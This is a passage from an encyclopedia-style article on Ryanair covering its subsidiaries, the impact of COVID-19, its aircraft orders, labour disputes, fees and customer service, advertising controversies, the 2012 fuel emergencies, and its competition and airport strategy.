million passengers by the early 2020s, up from 120 million passengers. 108 For over a decade, Ryanair had only operated with its Irish Air Operator's Certificate and solely under the Ryanair brand. However, starting in 2018 the airline began introducing additional brands and operating on multiple certificates in different countries. In 2017, Ryanair announced that it would launch an independent Polish subsidiary in 2018, operating charter flights from Poland to Mediterranean destinations. Aside from turning away from the company's policy of only operating on a single Air Operator's Certificate, the step also meant that Ryanair would be launching charter flights after having focused only on scheduled operations before. 109 The subsidiary was branded Ryanair Sun and received its Polish Air Operator's Certificate in April 2018 and subsequently launched 110 Initially, it had only one former Ryanair Boeing 737 800 and complemented its operation with wet-leased aircraft from its mother company. In late 2018, Ryanair Sun was expanded by transferring all Polish-based Ryanair aircraft to it. The decision was made in the wake of staff costs and unions. 
clarification needed 111 As a consequence, Ryanair Sun mainly operated scheduled flights on behalf of its mother company using Ryanair's FR flight numbers. Ryanair Sun was rebranded Buzz in 2019. 112 Also in 2018, Ryanair expanded its portfolio with Austrian-based Laudamotion, later renamed "Lauda". Laudamotion was the successor of Niki, which had folded as a consequence of the Air Berlin demise. 113 The company was founded by Niki Lauda. 113 Initially, Ryanair purchased a 25 per cent share in Laudamotion to increase the share to 75 per cent pending government approval. The deal was announced in March 2018 ahead of the carrier's launch in June 2018. 114 After increasing its share to 75 per cent, Ryanair fully acquired the Austrian airline in December 2018. 115 Ryanair UK was established in December 2017 in anticipation of Brexit. Its first aircraft, G-RUKA, was transferred from Ryanair DAC in 2018, with a second aircraft following in 2019. As of April 2023, Ryanair UK has 13 aircraft. On 23 Aug 2018, Ryanair announced a new baggage policy. Under this policy, Priority Boarding allows for a larger and a smaller bag, capped by the capacity on the airplane. The company claimed this reduces turnaround times and simplifies the baggage policy. 116 non-primary source needed After this, many other low cost airlines introduced similar policies, for example Wizz Air. 117 non-primary source needed On 28 September 2018, pilots, cabin crew and other staff called for a strike due to the transition from workers being employed on Irish contracts and subject to Irish legislation to their own countries' labour laws, along with an issue in their pay. Due to the lobbying of the crew and walk-outs of pilots, the airline had to cancel 250 flights, which affected around 40,000 passengers. 118 119 In early 2019 due to the transition inside the holdings company, each airline (Ryanair, LaudaMotion, Ryanair Sun and Ryanair UK) got its own CEO and management team. 15 Edward Wilson became the CEO of the airline Ryanair and Michael O'Leary became the Group CEO. 120 On 9 June 2019, Ryanair announced, together with the Government of Malta, that it would establish a new airline called Malta Air (not to be confused with Air Malta), which will consist of an initial fleet of ten aircraft and assume the 61 flights currently operated by Ryanair from the island. The fleet was registered in Malta while a new repair and maintenance hangar was also set up. 121 122 Ryanair transferred all its existing Maltese operations to the new airline and its fleet was expected to increase from the six Boeing 737 800 aircraft currently allocated to the Malta market to ten (all to be in Malta Air colours) by mid 2020. 123 The carrier's CEO made comments at the A4E Aviation Summit in Brussels on 3 March 2020. Michael O'Leary said that he expected people to get 'bored' of the COVID 19 pandemic and saw a recovery by the summer of 2020. 124 That changed, with Ryanair announcing in a statement that it expected demand to return to 2019 levels by the summer of 2022. 125 The COVID 19 pandemic had a significant impact on Ryanair. While the CEO, Michael O'Leary, remained adamant that state aid was not an option, the carrier announced several changes to its operations. This included the loss of 3000 jobs, announced on 1 May 2020, which affected mainly pilots and cabin crew. This came as the airline announced it would suspend the majority of its operations until June 2020. 
125 In July 2020, Ryanair's CEO, Michael O'Leary announced that the company had made a net loss of 185 million in the period April June 2020. In comparison, in the same period of 2019, the firm made a net profit of 243 million. 126 In September 2020, the airline threatened to leave Ireland due to COVID 19 restrictions. 127 Despite their original plan, to fly 60% of the previous year's schedule, in October 2020, the company decided to reduce the number of flights between the period of November 2020 March 2021 to 40%. According to O'Leary, this was a result of "government mismanagement of EU air travel" as the quarantine travel measures were loosened. 128 By the end of December 2020, the airline reported an 83% drop in annual passengers, from 2019. 129 In December 2020, Ryanair increased its order for Boeing 737 MAX 8 aircraft by 75, to a total of 210 aircraft, for delivery from early 2021 to December 2024. 130 Due to the persisting COVID 19 pandemic, Ryanair expected losses of between 800m and 850m in their fiscal year of 2021. Only 27.5 million passengers flew compared to 148.6 million passengers in the previous financial year. The full financial report was released on 17 May 2021. 131 The company reported a record annual loss of $989 million. 132 In May 2023 Ryanair confirmed an order with Boeing to purchase 300 Boeing 737 MAX 10 aircraft, with a total list price of $40 billion ( 36.3bn). The deal included 150 firm orders and options for 150 more, for delivery between 2027 and 2033. Half of this order would replace withdrawn 737 800s. 133 The order followed an 18 month public argument with Boeing over pricing, and Ryanair ultimately achieved a lower discount than their previous orders. 134 While Ryanair had previously returned cash to shareholders via share buybacks and one-off distributions, they announced their first regular dividend in November 2023. 135 In December 2023, Ryanair became the most valuable airline in the world and the largest airline outside the US. 136 In 2024, they were again the "largest player in the region". 137 138 Ryanair announced a $1.4 billion investment in Morocco for its Summer 2024 schedule, its largest in the country, including over 1,100 weekly flights on 175 routes, with 35 new ones. This expansion features Ryanair's introduction of ultra-low fares on 11 domestic routes - a first in Africa, aiming to boost internal connectivity and traffic growth. The plan includes a new base in Tangier with two aircraft and first flights to Beni Mellal and Errachidia. The investment, expected to deliver over 5 million passengers, supports over 500 direct jobs and stimulates economic growth across 12 cities. Ryanair's CEO, Eddie Wilson, highlighted the partnership's role in enhancing tourism and connectivity with fares from MAD330 each way. 139 The key trends for the Ryanair Group are (as of the financial year ending 31 March): 140 141 In 2023 the group had about 6,600 pilots and 13,400 cabin crew, 2,200 employees in administration, IT labs, ground operations and maintenance as well as 125 employees in the management. 160 The head office of Ryanair has been in the Airside Business Park in Swords, County Dublin, Ireland, since 2014. 161 David Daly, a developer, had built the facility before Ryanair's 2012 purchase. 162 The building has 100,000 square feet (9,300 m2) of space, 163 and the airline paid 11 million to occupy the building. According to John Mulligan of the Irish Independent, it was thought that Ryanair would refurbish the building for another 9 million. 
162 Previously, since 2004, the head office had been on the property of Dublin Airport, in proximity to the Aer Lingus head office. 164 Darley Investments built the facility in 1992. Ryanair later purchased Darley and had a 30 year lease of the head office facility from the Department of Transport of Ireland. The company negotiated to pay no rent for 12 years, then 122,000 year until 2008, then 244,000 year for the remainder of the lease. 162 In the early years, when Ryanair had a total of 450 employees who each had shares in the company, there was an agreement that staff would not join a labour union on the basis that they would influence how the company was run. 165 The treatment of employees has changed considerably since then and new employees no longer get shares in the company. While Ryanair announced in December 2017 that it would recognise pilots' unions, the company still refuses to recognise or negotiate with any union for cabin crew. citation needed In 2011, a former Ryanair captain was awarded financial compensation by an employment tribunal in London after being fired for handing out a union form to a cabin crew member while on duty. 166 In 2012, the Ryanair Pilot Group (RPG) was formed, but to date when? has not been successful in its aim to represent the pilots flying for Ryanair as a collective bargaining unit. citation needed Thousands of flight cancellations on 15 September 2017 triggered pilots to mobilise, and on 15 December, in Italy, Ireland and Portugal, O Leary recognised unions for the first time, blaming their good timing; he anticipated an uptick in labour costs in 2018, not altering its model. 167 Ryanair discussed union recognition in response to threatened strikes over the Christmas period. 168 Ryanair faced criticism for allegedly forcing pilots to pay tens of thousands of Euros for training, then establishing limited companies in Ireland to have the pilots work for Ryanair through an agency, 23 as well as forcing ground staff in Spain to open bank accounts in Gibraltar in which to receive their wages. 169 In May 2014, Ryanair's office in Marseille was raided by French police investigating complaints that the company was failing to follow French employment law. Ryanair protested about the raid. 170 In May 2015, the Mayor of Copenhagen announced a boycott of Ryanair. This came in the wake of protests from Danish unions regarding employment conditions. 24 After a court trial confirmed the unions' right to strike, Ryanair moved its bases out of Denmark. 171 On 10 August 2018, pilots of Ryanair in Germany, Sweden, Ireland, Belgium and the Netherlands walked out for 24 hours, leaving 400 flights cancelled. 25 It is considered by whom? to be one of the biggest strikes over pay issues. citation needed On 26 September 2018, Ryanair was forced to cancel 150 flights scheduled for that day, accounting for roughly 6% of its total flights, due to strikes in Spain, Belgium, the Netherlands, Portugal, Italy, and Germany. The British Civil Aviation Authority (CAA) urged the company to compensate the 2,400 affected passengers under EU Regulation 261, but Ryanair stated that it would refuse to accept any claims for compensation. 172 In December 2018, the Civil Aviation Authority announced that it would be taking legal action against Ryanair over its refusal to compensate thousands of UK-based customers. 173 In April 2021, the High Court rejected Ryanair's claim that it was exempt from awarding compensation because the disruption was due to "extraordinary circumstances". 
The ruling was upheld by the Court of Appeal in February 2022, though Ryanair may still appeal to the Supreme Court. 174 Twenty per cent of Ryanair's revenue is generated from ancillary revenue; that is, income from sources other than ticket fares. In 2009, ancillary revenue was at 598 million, compared to total revenue of 2,942 million. 175 Ryanair has been described by the consumer magazine Holiday Which? as being the worst offender for charging for optional extras. 26 As part of the low-cost business model, the airline charges fees, which can be related to alternative services such as using airport check-in facilities instead of the online service fee and paying by credit card. It also charges for extra services like checked-in luggage, and it offers food and drinks for purchase as part of a buy on board programme. 176 In 2009, Ryanair abolished airport check-in and replaced it with a fast bag drop for those passengers checking in bags. 177 The option of checking in at the airport for 10 has been discontinued, and all passengers are required to check-in online and print their boarding pass. Passengers arriving at the airport without a pre-printed online check-in will have to pay 55 45 for their boarding pass to be re-issued, while customers unable to check-in luggage online are asked to pay a fee which varies depending on where they are travelling to at the airport (as of June 2012). Ryanair faced criticism over the ambiguous nature of these changes. 178 27 New Ryanair aircraft have been delivered with non-reclining seats, no seat-back pockets, safety cards stuck on the back of the seats, and life jackets stowed overhead rather than under the seat. This allows the airline to save on aircraft costs and enables faster cleaning and security checks during short turnaround times. 179 Ryanair reportedly wanted to order its aircraft without window shades, 179 but the new aircraft do have them, as it is required by the regulations of the Irish Aviation Authority. citation needed Other proposed measures to reduce frills further have included eliminating two toilets to add six more seats, 180 redesigning the aircraft to allow standing passengers travelling in "vertical seats", charging passengers for using the toilet, 181 charging extra for overweight passengers, 182 and asking passengers to carry their checked-in luggage to the aircraft. 183 While CEO Michael O'Leary initially claimed that charging passengers for toilets was "going to happen", he stated days later that it was "technically impossible and legally difficult" but made for interesting and very cheap PR". 31 Ryanair has been criticised for many aspects of its customer service. The Economist wrote that Ryanair's "cavalier treatment of passengers" had given Ryanair "a deserved reputation for nastiness" and that the airline "has become a byword for appalling customer service ... and jeering rudeness towards anyone or anything that gets in its way". 184 In January 2019, a survey conducted by Which? found that the airline was the UK's least-liked short-haul airline, for the sixth year running. 29 Ryanair responded by saying that passenger numbers had risen 80% in the previous six years and this was a more accurate reflection of the airline's popularity than an "unrepresentative survey of just 8,000 people". 185 In August 2019, Ryanair came bottom in an annual Which? survey rating the customer services of 100 popular UK brands. 
186 In 2002, the High Court of Ireland in Dublin awarded Jane O'Keefe 67,500 damages and her costs after Ryanair reneged on a free travel prize she was awarded for being the airline's 1 millionth passenger. 187 188 The airline has come under heavy criticism for its poor treatment of disabled passengers. In 2002, it refused to provide wheelchairs for disabled passengers at London Stansted Airport, greatly angering disabled rights groups. 189 The airline argued that this provision was the responsibility of the airport authority, stating that wheelchairs were provided by 80 of the 84 Ryanair destination airports, 190 at that time. A court ruling in 2004 judged that the responsibility should be shared by the airline and the airport owners; 191 Ryanair responded by adding a surcharge of 0.50 to all its flight prices. 192 In July 2012, a 69 year-old woman, Frances Duff, who has a colostomy, was refused permission to bring her medical kit on board, despite having a letter from her doctor explaining the need for her to carry this with her, and was asked by Ryanair boarding staff to lift her shirt in front of fellow passengers, to prove that she had a colostomy bag. Duff had previously attempted to contact Ryanair on three occasions to inquire about its policy regarding travellers' colostomy bags, but each time no one answered the phone after half an hour. 193 On 4 April 2011, Ryanair began adding a surcharge of 2 to its flights to cover the costs arising from compliance with EC Regulation 261 2004, which requires it to pay for meals and accommodation for passengers on delayed and cancelled flights. 194 Ryanair did not offer customers the possibility of contacting it by email or webform, only through a premium rate phone line, by fax or by post; however, it does now have a web form contact option and a live chat. An early day motion in the British Parliament put forward in 2006 criticised Ryanair for this reason and called on the company to provide customers with a means to contact the company by email. 195 Ryanair offers a basic rate telephone number for post-booking enquiries in the United Kingdom, which chose to omit the exemption for passenger transport services when enacting Article 21 of Directive 2011 83 EU on Consumer Rights under Regulation 41 of the Consumer Contracts (Information, Cancellation and Additional Payments) Regulations 2013. 196 On 17 June 2014, Ryanair announced a new campaign to re-invent itself as a more family-friendly airline. Speaking at the company's 2014 AGM, chief executive Michael O'Leary said that the airline needed to "stop unnecessarily pissing people off". Ryanair said up to 20% of its 81 million customers were travelling as families, and it wanted to raise that figure. Kenny Jacobs, Ryanair's chief marketing officer, said: "Families are a big deal for us. It's a group of customers that we want to get closer to". 197 As another step, the company launched LiveChat on its website to improve the quality of service and experience provided by the company. 198 This change in their approach had an almost immediate positive effect on the company's finances. 199 Ryanair was subject to widespread criticism 200 201 202 203 204 after it announced that it would be cancelling between 40 and 50 flights per day (about 2% of total daily flights) during September and October 2017. Flights were cancelled with very little notice, sometimes only hours before departure. 
Ryanair said that the cancellations aimed "to improve its system-wide punctuality" 205 which had dropped significantly in the first two weeks of September, which the airline attributed to "ATC capacity delays and strikes, weather disruptions and the impact of increased holiday allocations to pilots and cabin crew". 205 In subsequent statements, Ryanair acknowledged that it had "messed up" holiday schedules for pilots, including a change to the calendar year for how vacations were calculated. 206 In late December, a survey rated Ryanair and Vueling equally the worst in the world for customer service among short-haul carriers in the Which? survey. Ryanair responded, t his survey of 9,000 Which? members is unrepresentative and worthless, during a year when Ryanair is the world’s largest international airline (129 m customers) and is also the world’s fastest-growing airline (up to 9 m customers in 2017). We have apologised for the deeply regretted flight cancellations and winter schedule changes, and the disruption they caused to less than 1% of our customers". 207 In June 2022, Ryanair faced severe anger and backlash for making South Africans take a general knowledge test in the Afrikaans language before allowing them to board UK-bound flights, as a means to verify that their passports were genuine. South Africa has 11 official languages, of which Afrikaans is the 3rd most spoken, with a prevalence of 12%. A majority of the population cannot understand Afrikaans, and some refuse to speak it on principle, regarding it as the language of oppression during the Apartheid era. 208 Michael O'Leary subsequently announced that the test was being dropped following outrage in South Africa. 209 210 In 2018, Ryanair became the first airline and the only non-coal-power plant to be among the 10 companies with the highest amount of CO2 emissions in the EU. That year, Ryanair had an emission equivalent of 9.9 megatonnes of CO2. Emissions had risen by 49% over five years. Environmentalists criticized the airline harshly and saw it as a sign of the lack of taxation of aviation. 211 In 2020, Ryanair was criticised for releasing misleading advertisements through their claim they were "Europe's… Lowest Emissions Airline", using figures from an airline efficiency rating dating back to 2011. 212 Ryanair's advertising and the antics of Michael O'Leary, such as deliberately courting controversy to generate free publicity for the airline, 213 have led to several complaints to the Advertising Standards Authority (ASA) and occasionally court action being taken against the airline. 214 32 215 216 An example of this was the live BBC News interview on 27 February 2009 when Michael O'Leary, observing that it was "a quiet news day", commented that Ryanair was considering charging passengers 1 to use the toilet on its flights. The story subsequently made headlines in the media for several days and drew attention to Ryanair's announcement that it was removing check-in desks from airports and replacing them with online check-in. Eight days later O'Leary eventually admitted that it was a publicity stunt saying "It is not likely to happen, but it makes for interesting and very cheap PR". 217 The concept of Ryanair charging for even this most essential of customer services was foreseen by the spoof news website "The Mardale Times" some five months previously, in its article "Ryanair announce new 'Pay-Per-Poo' service". 218 Ryanair often uses advertising to make direct comparisons and attack its competitors. 
One of its advertisements used a picture of the Manneken Pis, a famous Belgian statue of a urinating child, with the words: "Pissed off with Sabena's high fares? Low fares have arrived in Belgium. Sabena sued and the court ruled that the advertisements were misleading and offensive. Ryanair was ordered to discontinue the advertisements immediately or face fines. Ryanair was also obliged to publish an apology and publish the court decision on its website. Ryanair used the apologies for further advertising, primarily for further price comparisons. 214 Another provocative ad campaign headlined "Expensive BAstards compared Ryanair with British Airways. As with Sabena, British Airways disagreed with the accompanying price comparisons and brought legal action against Ryanair. However, in this case, the High Court sided with Ryanair and threw BA's case out, ordering BA to make a payment towards Ryanair's court costs. The judge ruled "The complaint amounts to this: that Ryanair exaggerated in suggesting BA is five times more expensive because BA is only three times more expensive. 219 In 2007, Ryanair used an advertisement for its new Belfast route which showed Sinn F in's Martin McGuinness (Northern Ireland deputy First Minister and a former senior commander of the IRA) standing alongside party president Gerry Adams with a speech bubble which said "Ryanair fares are so low even the British Army flew home". 220 221 222 Ulster Unionists reacted angrily to the advertisement, while the Advertising Standards Authority said it did not believe the ad would cause widespread offence. 223 An advertisement depicting a model dressed as a schoolgirl was accompanied by the words "Hottest back to school fares". Ryanair advertised two Scottish and one UK-wide newspaper. After receiving 13 complaints, the advertisement was widely reported by national newspapers. The Advertising Standards Authority (ASA) instructed the airline to withdraw the advertisement in the United Kingdom, saying that it "appeared to link teenage girls with sexually provocative behaviour and was irresponsible and likely to cause serious or widespread offence". Ryanair said that it would "not be withdrawing this ad" and would "not provide the ASA with any of the undertakings they seek", on the basis that it found it absurd that "a picture of a fully clothed model is now claimed to cause 'serious or widespread offence' when many of the UK's leading daily newspapers regularly run pictures of topless or partially dressed females without causing any serious or widespread offence". 224 In late 2020, the airline faced criticism over its "jab and go" advert. 225 Although it usually does not serve the primary airports of major European cities, Ryanair has been criticised for placing the names of famous cities on distant secondary airports that were not built for tourist traffic and lacked transit links to the main city. Examples include "Paris Beauvais" (85 km (53 mi) north-northwest of Paris), "Brussels South" (46 km (29 mi) to the south of Brussels), "Milan Bergamo" (45 km (28 mi) from Milan), "Frankfurt Hahn" (102 km (63 mi) from Frankfurt and actually closer to the cities of Koblenz and Mainz), "D sseldorf Weeze" (83 km (52 mi) from D sseldorf and closer to Arnhem or Essen), "Glasgow Prestwick" (55 km (34 mi) from Glasgow), "Stockholm Skavsta" (84 km (52 mi) from Stockholm) and "Barcelona Reus" (88 km (55 mi) from Barcelona). Frommers has dubbed Ryanair the "ultimate bait-and-switch airline" for this deceptive practice. 
226 Ryanair was ordered by the ASA to stop claiming that its flights from London to Brussels were faster than the rail connection Eurostar, because the claim was misleading, due to the required travel times to the airports mentioned. Ryanair stood by its claims, noting that the flight time is shorter than the train trip and that travel time is also required to reach Eurostar's stations. 227 228 In April 2008, Ryanair faced a probe by the UK Office of Fair Trading, after a string of complaints about its adverts. It was found to have breached advertising rules seven times in two years. ASA's director general Christopher Graham commented that formal referrals to the OFT were rare, the last occurring in 2005. He added that the ASA "would prefer to work with advertisers within the self-regulatory system rather than call in a statutory body, but Ryanair's approach has left us with no option". Ryanair countered with the claim that the ASA had "demonstrated a repeated lack of independence, impartiality and fairness". 229 In July 2009, Ryanair took several steps to "increase the clarity and transparency of its website and other advertising" after reaching an agreement with the OFT. The airline's website now includes a statement that "fares don't include optional fees charges" and they now include a table of fees to make fare comparisons easier. 230 In July 2010, Ryanair once again found itself in controversy regarding alleged misleading advertising. Ryanair circulated advertisements in two newspapers offering 10 one-way fares to European destinations. Following a complaint from rival carrier EasyJet, the ASA ruled the offer was "likely to mislead". 231 Ryanair did not comment on the claim but did hit back at EasyJet, claiming it cared about details in this regard but did not itself publicise its on-time statistics. EasyJet denied this. citation needed In April 2011, Ryanair advertised a place in the sun destinations but the advert was banned when it was found that some of the destinations experienced sunshine for as little as three hours per day and temperatures between 0 and 14 C (32 and 57 F). 232 In 2016, Ryanair stated that websites such as Opodo and CheapOair and their partners engaged in screenscraping and false advertising, and attempted to prevent them from showing Ryanair data. 233 In February 2020 the Advertising Standards Authority told Ryanair to provide adequate evidence to support environmental claims after the ASA banned adverts that claimed Ryanair was the lowest emissions airline in Europe for being misleading. 234 Ryanair had claimed in the adverts that they had "the lowest carbon emissions of any major airline" and it was a "low CO2 emissions airline" based on Europe's top 27 airlines. 234 The ASA queried some figures and the definition of a "major airline" for the purposes of assessing . 234 Complainants said the adverts were misleading and could not be substantiated. 234 In response to the ASA Ryanair cited data from Eurocontrol and airline efficiency rankings from Brighter Plant. 234 However the ASA said that Ryanair had used an efficiency ranking from 2011 which was "of little value as substantiation for a comparison made in 2019". 234 The ASA said that customers would interpret the adverts as saying that flying with Ryanair would mean they contributed fewer CO2 emissions to the earth atmosphere, which could not be proven. 234 The ASA said that the adverts "ads must not appear again in their current forms" as claims in them could not be substantiated. 
234 In February 2011, a Ryanair passenger, Miro Garcia, brought a claim against Ryanair for unfair surcharges, claiming that the 40 ( 30) surcharge on passengers who failed to print out a boarding card before arrival at the airport was unfair. Judge Barbara Cordoba, sitting in the Commercial Court in Barcelona, held that, under international air travel conventions, Ryanair can neither demand passengers turn up at the airport with their boarding pass, nor charge them 40 ( 30) if they do not, and that the fines were abusive because aviation law obliges airlines to issue boarding passes. Judge Cordoba stated: "I declare abusively and, therefore, null, the clause in the contract by which Ryanair obliges the passenger to take a boarding pass to the airport. ... the customary practice over the years has been that the obligation to provide the boarding pass has always fallen on the airline". The judge ordered a refund for Mr Garcia and said the fact the company was a low-cost carrier did "not allow it to alter its basic contractual obligations". 28 Ryanair appealed the decision and the Appeals Court in Spain overturned the ruling in November 2011, holding that the surcharge complies with international law. 235 In December 2011, Ryanair announced that it would fight against the UK Treasury's plan to ban what Which? magazine called "rip-off" charges made when customers paid by credit card. 236 EU legislation has already been drafted against surcharges for methods of payment. 237 On 26 July 2012, three Ryanair aircraft inbound to Madrid Barajas Airport diverted to Valencia Airport due to severe thunderstorms in the Madrid area. All three aircraft declared an emergency (Mayday) when the calculated usable fuel on landing at Valencia Airport was less than the final reserve (30 minutes of flight) after having been held in the air for 50 to 69 minutes. 238 The Irish Aviation Authority investigated the incidents and came to several conclusions, including: The Irish Aviation Authority made several recommendations, including that Ryanair should "review its fuel policy and consider issuing guidance to Crew concerning fuel when operating into busy airports with mixed aircraft operators and types, particularly in poor weather conditions when diversions are likely. 239 The IAA also recommended that the Spanish Aviation Safety and Security Agency "review delays into Madrid to consider if additional fuel should be recommended or required to be carried in normal operations, particularly where the southerly Runways are in operation. 239 Among the causes of the incident, the Civil Aviation Accident and Incident Investigation Commission concluded that "the company's fuel savings policy, though it complies with the minimum legal requirements, tends to minimise the amount of fuel with which its aircraft operate and leaves none for contingencies below the legal minimums. This contributed to the amount of fuel used being improperly planned and to the amount of fuel onboard dropping below the required final fuel reserve. 240 In an interview with the Dutch investigative journalism programme KRO Reporter, four anonymous Ryanair pilots claimed they were being pressured to carry as little fuel as possible on board to cut costs. 241 Ryanair and its CEO Michael O'Leary denied the allegations and sued KRO. 
242 243 On 16 April 2014, the Dutch Court decided that KRO had provided sufficient evidence in two television episodes of Mayday, Mayday broadcast in 2012 and 2013 to back the claims in respect of Ryanair's fuel policy and "fear culture". It also found that Ryanair had been given a right to reply in response to the claims. The broadcast of the programmes was found to be in the public interest. Ryanair was ordered to pay the legal costs of the case. 244 Starting in late March 2020, in response to flight cancellations due to travel restrictions set by governments due to COVID 19, Ryanair was forced to cancel flights. This resulted in many of their staff being placed on furlough, with pay being cut by up to 50% for some employees placed on the Irish Temporary Wage Subsidy Scheme (TWSS). 245 The handling of refunds from Ryanair has caused a surge in complaints to the Commission for Aviation Regulation (CAR), with customers claiming that they have been refused a refund for the flight cancellation. 246 Many organisations have taken a stance against the aviation industry via actions or declarations in the press. 247 The Italian civil aviation authority ENAC has threatened a ban of Ryanair due to alleged violation of local COVID 19 regulations. 248 The Ryanair chief executive Michael O'Leary said its planes would not fly if the airline was required to leave its middle seats empty to comply with in-flight social distancing rules. 249 He said blocking the space between seats was "idiotic" and would have no beneficial effect. 250 Ryanair has several low-cost competitors. Although traditionally a full-service airline, Aer Lingus moved to a low-fares strategy from 2002, leading to a much more intense competition with Ryanair on Irish routes. 251 Ryanair is a member of Airlines for Europe, having formerly been a member of the defunct European Low Fares Airline Association. 252 253 Airlines that attempt to compete directly with Ryanair are treated competitively, with Ryanair being accused by some of reducing fares to significantly undercut its competitors. In response to MyTravelLite, which started to compete with Ryanair on Birmingham to Dublin route in 2003, Ryanair set up competing flights on some of MyTravelLite's routes until it pulled out. Go was another airline that attempted to offer services from Ryanair's base in Dublin to Glasgow and Edinburgh in Scotland. A fierce battle ensued, which ended with Go withdrawing its service from Dublin. 254 In September 2004, Ryanair's biggest competitor, EasyJet, announced routes to Ireland for the first time, beginning with the Cork to London Gatwick route. Until then, EasyJet had never competed directly with Ryanair on its home ground. EasyJet later withdrew its Gatwick-Cork, Gatwick-Shannon, Gatwick-Knock and Luton-Shannon routes. 255 In 2012, Ryanair also responded to the decision of another low-cost carrier, Wizz Air, that planned to move its flight operations from Warsaw Chopin Airport in Poland to the new low-cost Warsaw Modlin Airport in Nowy Dw r Mazowiecki. 256 Ryanair had previously operated the route to Dublin from Warsaw but withdrew, claiming that the fees at Warsaw's main airport were too high. When Wizz Air began operations from Modlin Airport, Ryanair began several new routes from the same airport, most of which were identical to routes offered by Wizz Air. In 2008, Ryanair asked the Irish High Court to investigate why it had been refused permission to fly from Knock to Dublin. 
This route was won by CityJet, which could not operate the service. The runner-up, Aer Arann, was then allowed to start flights, a move Ryanair criticises as the basis of not initiating an additional tender process was unlawful. 257 DFDS Seaways cited competition from low-cost air services, especially Ryanair, which now flies to Edinburgh Airport and London Stansted Airport from G teborg Landvetter Airport, as the reason for scrapping the Newcastle Gothenburg ferry service in October 2006. 258 It was the only dedicated passenger ferry service between Sweden and the United Kingdom and had been running under various operators since the 19th century. Ryanair's largest base is at London-Stansted, followed by its home base at Dublin Airport. 261 Ryanair operates bases across Europe, some parts of the Middle East, and North Africa. 262 Ryanair traditionally prefers to fly to smaller or secondary airports, such as London Stansted or Paris Beauvais, usually outside major cities to help the company benefit from lower landing fees and quick turn-around times to reduce costs. Ryanair has even referred to Bratislava Airport in Slovakia as "Bratislava Vienna", despite Vienna being 80 km (50 mi) away in another country. In some cases, secondary airports are not distant from the city they serve, and can be closer than the city's major airport; this is the case at Rome Ciampino Airport. Ryanair does still serve several major airports, including Amsterdam Schiphol, Stockholm Arlanda, Athens, Barcelona El Prat, Bucharest-Otopeni, Budapest, Copenhagen, Dublin, Lisbon, London-Gatwick, Madrid Barajas, Marseille, Oslo-Gardermoen and Rome-Fiumicino. Some of these cities do not have a viable secondary airport that Ryanair could use as an alternative. 226 More recently, Ryanair has grown more at primary airports as it looks to attract more business passengers. In the summer of 2014, the airline opened bases in Athens, Lisbon and the primary airports of Brussels and Rome for the first time. Ryanair flies in a point to-point model rather than the more traditional airline hub and spoke model where the passengers have to change aircraft in transit at a major airport, usually being able to reach more destinations this way. 263 264 In April 2017 Ryanair added connecting flights to its portfolio, starting with a new transfer hub in Rome Fiumicino Airport (FCO). 265 Despite it being an Irish airline, it also has a significant presence in France, Germany, Italy, Poland, Spain, the United Kingdom as well as many other European countries. Currently, its biggest country market is Italy, with fourteen bases and nine non-base airports. Ryanair's largest competitor is EasyJet which has a far greater focus on larger or primary airports such as Amsterdam and Paris-Charles de Gaulle, heavily targeting business passengers. Ryanair also serves sun and beach destinations with bases in Sicily, the Canary Islands, Cyprus, the Greek Islands, and Malta among others. In August 2014, the airline unveiled ambitious plans to establish a major hub in Israel to service a broad range of European routes. 266 In December 2014 Ryanair announced plans to open its 72nd base in 2015 in the Azores. 267 In February 2018, due to the Scottish Government not abolishing or reducing Air Passenger Duty (APD), Ryanair announced that it would cut many flights out of Glasgow Airport resulting in the airline closing its base there. The only routes out of Glasgow by the end of October were Dublin, Krak w and Wroclaw, with the rest being suspended permanently. 
This resulted in the loss of 300 members of airport staff. In April 2019, the airline reinstated four of its routes; to Alicante, Brussels, M laga and Warsaw. 268 In 2022, Ryanair announced that it would close its base at Frankfurt Airport in a row over fees, with the loss of 17 routes. The five aircraft based there are to be based in other locations throughout Europe. citation needed When Ryanair negotiates with airport operators, it demands very low landing and handling fees, as well as financial assistance with marketing and promotional campaigns. 270 In subsequent contract renewal negotiations, the airline has been reported to play airports against each other, threatening to withdraw services and deploy the aircraft elsewhere, if the airport does not make further concessions. According to Michael O'Leary's biography, A Life in Full Flight, Ryanair's growing popularity and also growing bargaining power, with both airports and aircraft manufacturers, has resulted in the airline being less concerned about a market research demographics approach to route selection to one based more on experimentation. This means it is more likely to fly its aircraft between the lowest-cost airports in anticipation that its presence alone on that route will be sufficient to create a demand which previously may not have existed, either in whole or in part. 271 In April 2006, a failure to reach an agreement on a new commercial contract resulted in Ryanair announcing that it would withdraw service on the Dublin Cardiff route at short notice. 272 The airport management rebutted Ryanair's assertion that airport charges were unreasonably high, claiming that the Cardiff charges were already below Ryanair's average and claimed that Ryanair had recently adopted the same negotiating approach with Cork Airport and London Stansted Airport. 273 In 2009, Ryanair was reported to have adopted "harsh" negotiating with Shannon Airport, threatening to close 75% of its operations there from April 2010. 274 Ryanair was forced to give up its Rome Ciampino Alghero route, after the route was allocated to Air One, as a public service obligation (PSO) route. The European Commission is investigating the actions of the Italian government in assigning PSO routes and thus restricting competition. citation needed In 2016, Ryanair withdrew over half of its flights from Rygge airport in Norway, after which the airport decided to close down totally, as it was privately owned and would make a loss on the low traffic volume. citation needed In order to further decrease airport costs and turnaround times, Ryanair flights often board and deplane from both the front and rear of the aircraft using boarding stairs or built-in airstairs rather than more expensive jet bridges. 275 In some cases, and more frequently as time has gone on, Ryanair has decided to use large airports where it is not dominant and pay the normal fees. Examples include Barcelona, Oslo, Copenhagen and Manchester, where the carrier increased flights in 2021. 276 As of July 2024, the Ryanair Group fleet consists of the following aircraft: 277 278 279 280 281 needs update Ryanair has operated the following types of aircraft in the past: Following the 2019 grounding of all 737 MAX aircraft, Ryanair initially reaffirmed its confidence in the aircraft and indicated that it would be ready to place a new order once it had returned to service; it would seek a reduced price instead of cash compensation. 
